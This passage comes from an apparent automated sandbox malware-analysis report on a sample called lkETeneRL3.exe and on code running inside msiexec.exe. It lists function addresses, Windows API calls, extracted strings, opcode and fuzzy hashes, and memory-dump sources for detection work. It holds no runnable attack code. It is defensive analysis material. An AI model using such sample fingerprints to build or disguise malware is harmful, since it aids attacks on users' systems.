Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA

Function 0040591C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lkETeneRL3.exe,C:\Users\user\Desktop\lkETeneRL3.exe,80000000,00000003), ref: 00405922
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lkETeneRL3.exe,C:\Users\user\Desktop\lkETeneRL3.exe,80000000,00000003), ref: 00405930

Strings

C:\Users\user\Desktop, xrefs: 0040591C

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED

Function 00405A3B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9

Analysis Process: msiexec.exePID: 7376, Parent PID: 7708COMMON

Executed Functions

Function 004CC147 Relevance: 6.5, Strings: 5, Instructions: 226COMMON

Download Yara Rule

Strings

LjEp, xrefs: 004CC377
LjEp, xrefs: 004CC38D
PHq, xrefs: 004CC3EF
0oEp, xrefs: 004CC20A
PHq, xrefs: 004CC400

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 9e37a497770f4e9a42488f7fb72c67fe5e1abc8d9e52ac0f6c2f214635a90279
Instruction ID: 3e970907abbdf334708a466cd046a732a6c06f4eea503c2260ba326bcf36975d
Opcode Fuzzy Hash: 9e37a497770f4e9a42488f7fb72c67fe5e1abc8d9e52ac0f6c2f214635a90279
Instruction Fuzzy Hash: DAA1C374E00258DFDB54DFAAD884B9DBBF2BF89310F14806AE809AB361DB359941CF54

Function 004C5362 Relevance: 6.4, Strings: 5, Instructions: 196COMMON

Download Yara Rule

Strings

LjEp, xrefs: 004C5566
PHq, xrefs: 004C55C8
LjEp, xrefs: 004C5550
PHq, xrefs: 004C55D9
0oEp, xrefs: 004C53E2

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 15f2142b1e3b3cde40f661b7e7db48886270f37098c657e92de9466c575874a4
Instruction ID: 9f182a678bf5ca20add18e2126f9f2407082d07c8ae7e50c9718a52e27c01518
Opcode Fuzzy Hash: 15f2142b1e3b3cde40f661b7e7db48886270f37098c657e92de9466c575874a4
Instruction Fuzzy Hash: A891D774E00618DFDB54DFA9C844B9DBBF2BF89301F14806AD809AB365DB34A985CF54

Function 004CC468 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PHq, xrefs: 004CC6D0
0oEp, xrefs: 004CC4DA
PHq, xrefs: 004CC6BF
LjEp, xrefs: 004CC647
LjEp, xrefs: 004CC65D

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 4adda95ee05539f0652c924d55ad0c549a44acdbd89f78b7d6fd27d5a9cb23fa
Instruction ID: cc1ef037d721b3d2055e5a52e41ef19891586a2f3aef560c55ab12f83f4fed98
Opcode Fuzzy Hash: 4adda95ee05539f0652c924d55ad0c549a44acdbd89f78b7d6fd27d5a9cb23fa
Instruction Fuzzy Hash: FB81B274E00218DFEB54DFAAD984B9DBBF2BF88304F14806AE819AB365DB345941CF54

Function 004CCCD8 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

0oEp, xrefs: 004CCD4A
LjEp, xrefs: 004CCEB7
LjEp, xrefs: 004CCECD
PHq, xrefs: 004CCF2F
PHq, xrefs: 004CCF40

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 670d865b55165ddd823867e9f12ece91ef44aaee72019527cf0da40c2678883d
Instruction ID: c813aa9c5686b3ee979541747a6579b1d6295ce7d904366c460602e80ed2b7b6
Opcode Fuzzy Hash: 670d865b55165ddd823867e9f12ece91ef44aaee72019527cf0da40c2678883d
Instruction Fuzzy Hash: 4281A274E002189FEB54DFAAD984B9DBBF2BF89300F14C06AE809AB365DB345941CF54

Function 004CD278 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

LjEp, xrefs: 004CD46D
PHq, xrefs: 004CD4E0
LjEp, xrefs: 004CD457
0oEp, xrefs: 004CD2EA
PHq, xrefs: 004CD4CF

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 4975701071ce9456395e6c2e78d3013f19d99f15eb06b56023c3b342fdee3e2f
Instruction ID: 5b423c6e453e4cb746398fd8f0d62b0a80041d8e1a228dcf58a32faa2fbc3f01
Opcode Fuzzy Hash: 4975701071ce9456395e6c2e78d3013f19d99f15eb06b56023c3b342fdee3e2f
Instruction Fuzzy Hash: 31819274E00218CFDB58DFAAD984B9DBBF2BF89301F14806AE809AB365DB345945CF15

Function 004CC738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

0oEp, xrefs: 004CC7AA
PHq, xrefs: 004CC98F
PHq, xrefs: 004CC9A0
LjEp, xrefs: 004CC917
LjEp, xrefs: 004CC92D

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: b6da8159cc8313a59d4aa2dd232de49bf70e9d6999dbd5d4bd42a3d094c77ad8
Instruction ID: e1a4ce0bdf03b8005b7426ea306232182d9e07e485f47b921900acaf82356ff1
Opcode Fuzzy Hash: b6da8159cc8313a59d4aa2dd232de49bf70e9d6999dbd5d4bd42a3d094c77ad8
Instruction Fuzzy Hash: E881A374E002189FEB54DFAAD984B9DBBF2BF88301F14C06AE419AB365DB345941CF54

Function 004CCA08 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjEp, xrefs: 004CCBE7
0oEp, xrefs: 004CCA7A
LjEp, xrefs: 004CCBFD
PHq, xrefs: 004CCC70
PHq, xrefs: 004CCC5F

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 5162b2d59ab6e7913745c704bc39acfaaae62ec9cf3bdc3329d65bc24b533269
Instruction ID: ea8676027e59606552f36953eb8b547e345adc1df51093f82f46c8ccefb3b046
Opcode Fuzzy Hash: 5162b2d59ab6e7913745c704bc39acfaaae62ec9cf3bdc3329d65bc24b533269
Instruction Fuzzy Hash: 9F819174E002189FEB54DFAAD884B9DBBB2BF88305F14C06AE819AB365DB345D41CF54

Function 004CCFAA Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PHq, xrefs: 004CD1FF
LjEp, xrefs: 004CD19D
0oEp, xrefs: 004CD01A
PHq, xrefs: 004CD210
LjEp, xrefs: 004CD187

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 0oEp$LjEp$LjEp$PHq$PHq
API String ID: 0-3801734409
Opcode ID: 2310bb85826b5d1d1795d8525360510cacfe9484bd5428703a8ca585f771e02e
Instruction ID: f6133359f9d21548b1e824542a6bd666a8ee1026e05d2b64a39e94e58b1de162
Opcode Fuzzy Hash: 2310bb85826b5d1d1795d8525360510cacfe9484bd5428703a8ca585f771e02e
Instruction Fuzzy Hash: CE81A274E002188FEB54DFAAD984B9DBBF2BF89315F14C06AE809AB365DB345941CF14

Function 004C3E09 Relevance: 2.9, Strings: 2, Instructions: 435COMMON

Download Yara Rule

Strings

Xq, xrefs: 004C3E47
$q, xrefs: 004C3E2E

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: 82ba542609193674da5df5662365b986b1f904379edefba4d3487ed5f0a982ee
Instruction ID: 6bdfe2ea7b343223948e8740d04db2bc8509a36f29257fdb31d2801b402a6094
Opcode Fuzzy Hash: 82ba542609193674da5df5662365b986b1f904379edefba4d3487ed5f0a982ee
Instruction Fuzzy Hash: EBF17F34E05218CFDB58DFB9C954AAEBBB2BF89300B14856EE406E7354DF399802CB55

Function 004CE97A Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c706f8a23f0ff4108a9d5daa71f970f026d1929d9b21a8c08e30ce4a367899
Instruction ID: e1b8e11e39985a5d82eff4a3be2101fc997c5bda0b3d18c8a157fb3b48aa7645
Opcode Fuzzy Hash: 55c706f8a23f0ff4108a9d5daa71f970f026d1929d9b21a8c08e30ce4a367899
Instruction Fuzzy Hash: 1151B674E00208DFDB18DFA6D494A9DBBB2FF88300F24C16AE815AB365DB355842CF14

Function 004CE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb1a9917a521e2146b48da92dcaa86bf04849f861939537b542583ccdb4a157
Instruction ID: fc6ffde306194022afefdf0142d9d95fc96a86725260da04a1604d285a7aad7b
Opcode Fuzzy Hash: ebb1a9917a521e2146b48da92dcaa86bf04849f861939537b542583ccdb4a157
Instruction Fuzzy Hash: 3A519474E00308DFDB18DFA6D494A9DBBB2BF89300F24D02AE815AB364DB355942CF55

Function 004C0CA0 Relevance: 25.5, Strings: 20, Instructions: 539COMMON

Download Yara Rule

Strings

\v(!, xrefs: 004C0E57
\v(!, xrefs: 004C0ECF
\v(!, xrefs: 004C0D17
\v(!, xrefs: 004C0CEF
\v(!, xrefs: 004C0E2F
\v(!, xrefs: 004C0EA7
\v(!, xrefs: 004C0CC7
LRq, xrefs: 004C0F19
\v(!, xrefs: 004C0D3F
H&T!, xrefs: 004C158C
\v(!, xrefs: 004C0D8F
Xc!, xrefs: 004C1777
\v(!, xrefs: 004C0E7F
pRc!Rc!, xrefs: 004C1500
\v(!, xrefs: 004C0D67
@!T!, xrefs: 004C0FB7
\v(!, xrefs: 004C0DDF
8 T!, xrefs: 004C0F62
\v(!, xrefs: 004C0DB7
\v(!, xrefs: 004C0E07

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 8 T!$@!T!$H&T!$LRq$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$\v(!$pRc!Rc!$Xc!
API String ID: 0-2710174454
Opcode ID: 61d6ae084dd84fa231166942f6161e5b49b16447ba8bb01f97fca063e65a92eb
Instruction ID: 97e9ef1448ebd7e14fd055425b679466bac320621f9c02e5328f2e3a8af7066c
Opcode Fuzzy Hash: 61d6ae084dd84fa231166942f6161e5b49b16447ba8bb01f97fca063e65a92eb
Instruction Fuzzy Hash: 5C52ED74940229CFCB54DF64DD88A9DBBF2FB88305F1085AAE809AB368DB746D45CF50

Function 004C5F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Hq, xrefs: 004C6023
Hq, xrefs: 004C6056

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 813dcf4ce0c192d39ea73379c6e55d48b373f821ca4badddcafcee7c12982179
Instruction ID: 0978555b858f110a032adb5c2909e3f975de48d386c4ad6d82db3c2c14c44bee
Opcode Fuzzy Hash: 813dcf4ce0c192d39ea73379c6e55d48b373f821ca4badddcafcee7c12982179
Instruction Fuzzy Hash: F291B1347042018FDB299F25C858B6F7BA2BF89301F1A846EE546CB395DF388C42D7A5

Function 004C6498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,q, xrefs: 004C6578
,q, xrefs: 004C656E

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 6a1d9214ed37589c0dfe8be62aab57188f375ea3c1519ab25ef74ecf6e51fbab
Instruction ID: 2af2cc0b7563826c33cf8851cb6b3560052558c5941eb1f7874feebd78ca3d6d
Opcode Fuzzy Hash: 6a1d9214ed37589c0dfe8be62aab57188f375ea3c1519ab25ef74ecf6e51fbab
Instruction Fuzzy Hash: 43818B38B005059FCB94CF69C484EAABBB2BF89305B26C16ED406D7365CB39EC41CB59

Function 004C2790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

FI, xrefs: 004C27BF

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: FI
API String ID: 0-1293059371
Opcode ID: 53a6271b13ee4e127d73edf7f9e03ef09a0aeb0e9d403f589afae12901e5614c
Instruction ID: 950b06c783c5092412c247d103c8fa974fa217f47406e9831eec007b77ebc53b
Opcode Fuzzy Hash: 53a6271b13ee4e127d73edf7f9e03ef09a0aeb0e9d403f589afae12901e5614c
Instruction Fuzzy Hash: 8C311774D452498FCB01DFB9D9496EEBFF0EF4A304F1041AAD405A7261EB780946CBA6

Function 004C62F0 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

3J!, xrefs: 004C62F0

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID: 3J!
API String ID: 0-2677224714
Opcode ID: 1ffb39db5efb5d0dc02b9ee4a49687e400f7ec743c8d19d77242af909f4289f9
Instruction ID: 6c43a75880a720dfee209f63d1115b2e930cfb8df69dd3989d3125c2da4e371d
Opcode Fuzzy Hash: 1ffb39db5efb5d0dc02b9ee4a49687e400f7ec743c8d19d77242af909f4289f9
Instruction Fuzzy Hash: E021D3353046508FC7255A29C458A2FB7A2BFC5751316847EEC06DB3A4CE38DC028B94

Function 004CE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc04f073926d0d0fe8216799fd34a5c35fd1f9c35b9431db1f3db1ebc8da54a9
Instruction ID: 739ba284c4a63c9354632fe6a2eadce8217c40fdbbf4e86685e468961fe760d3
Opcode Fuzzy Hash: cc04f073926d0d0fe8216799fd34a5c35fd1f9c35b9431db1f3db1ebc8da54a9
Instruction Fuzzy Hash: 091294340A12529FE344BF24D6AC12EBB64FB6F727326AC11B01FC0459EB7814998B36

Function 004CF71F Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfa963dcedc6e3e3c2ab9e4d1bf1c2f4b5cd5db11b46f45ad827d20ed4d344c3
Instruction ID: 8c98392e2e8fdd2086effc7fa07ff647894bf3e33e2bec5b711d9c6becc86bf4
Opcode Fuzzy Hash: dfa963dcedc6e3e3c2ab9e4d1bf1c2f4b5cd5db11b46f45ad827d20ed4d344c3
Instruction Fuzzy Hash: BD61E174D01318DFDB14DFA5C945BADBBB2FF88305F208569D806AB298DB396A46CF40

Function 004CD548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2596c0ae3399db50259abbf33ea1c9f2a5a24a9d204d9075033c8b74c80ba5cc
Instruction ID: f26d5e962a390dcd7e31b6e5e4aba107e8e5c1becc3702b7c9d8a65544cc95b5
Opcode Fuzzy Hash: 2596c0ae3399db50259abbf33ea1c9f2a5a24a9d204d9075033c8b74c80ba5cc
Instruction Fuzzy Hash: F6519474E01218DFDB44DFA9D984ADDBBF2BF89300F24816AE805AB365DB349901CF54

Function 004C41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8638e1edf03cd3a7cbe05ad659302b2647c009704cd36414bd045b70f545adcc
Instruction ID: 6557bf0e9aaf68072d641d955ec17332e47288c39a3d98d29ff69fe4b024dc82
Opcode Fuzzy Hash: 8638e1edf03cd3a7cbe05ad659302b2647c009704cd36414bd045b70f545adcc
Instruction Fuzzy Hash: D051A374E01218CFCB48DFAAD59499DBBF2FF89304B209469E805AB324DB35AC42CF54

Function 004C5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c27a4dce0eb0cfce469568fb26731c0c2b42c67c38ef79254db9fb9843b4ba
Instruction ID: 41ef95c2646a1784a4d256eaf6ff3c0bd7c777a547b06bd877f44c2afb386020
Opcode Fuzzy Hash: f6c27a4dce0eb0cfce469568fb26731c0c2b42c67c38ef79254db9fb9843b4ba
Instruction Fuzzy Hash: 7C319E35601109DFCB15AF65C844AAF7BA2FB48701F00842EF91987385DB3DDDA1DBA4

Function 004C28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3735c03884b9506acf64828c264639f2790b3d8dc70cee94f015d2ba940ff5fb
Instruction ID: c93aabc6713642ed34bb4f4a373860964e95a91a61376076edb60d8209e9a7d6
Opcode Fuzzy Hash: 3735c03884b9506acf64828c264639f2790b3d8dc70cee94f015d2ba940ff5fb
Instruction Fuzzy Hash: BB219F79B002159BCB54CE28C440FAE7BA5EB99360F61C51AD8099B348DAB5EE42CBD1

Function 004CF640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c69497910ea1a1c6b9024170b5c96849bb40f886fb4bc5d6717be537a6c0e86
Instruction ID: c848401d7819653c8c53fb402304b52c0d4b0d38eddfd794216f59ed397fb7db
Opcode Fuzzy Hash: 7c69497910ea1a1c6b9024170b5c96849bb40f886fb4bc5d6717be537a6c0e86
Instruction Fuzzy Hash: D5216F70D002099FDB01EFA9D440B9EBFF2FB84304F10C5BAD4449B265EB385A06CB81

Function 004C6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f151d53481cc47e06b62be970baec3171cc336f608d2b16ae401bcbaa2977de5
Instruction ID: 3cb80466c26903991f5c9acc87cf9e4cded6d4c7f029079b4df186df90a37e29
Opcode Fuzzy Hash: f151d53481cc47e06b62be970baec3171cc336f608d2b16ae401bcbaa2977de5
Instruction Fuzzy Hash: 0911A5393016119FC7295A2AC458A3FB7A6BFC575131A847DED06DB364CF29DC028794

Function 004C27F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e10e18e937c4cc9cc75a425a60ce579bb4b60ee18672520769e78fa921b0e3c
Instruction ID: 0e3fbe6cce2c1eced746e1907f6e0fae7d968c0d6c3131933c14aef531146d30
Opcode Fuzzy Hash: 3e10e18e937c4cc9cc75a425a60ce579bb4b60ee18672520769e78fa921b0e3c
Instruction Fuzzy Hash: 3221CF74C452498FCF41EFA9C9495EEBFF0BF4A300F10426AD805B2220EB355A85CBA5

Function 004CF650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2568263816.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5346e80fdbdf5f3d90177f02ee4830a8ae1a21af4c63338d66df069ed511af
Instruction ID: 98013ab939bd3701eda348559bb8661499c4b156954065ab75099ee2d4a0aa68
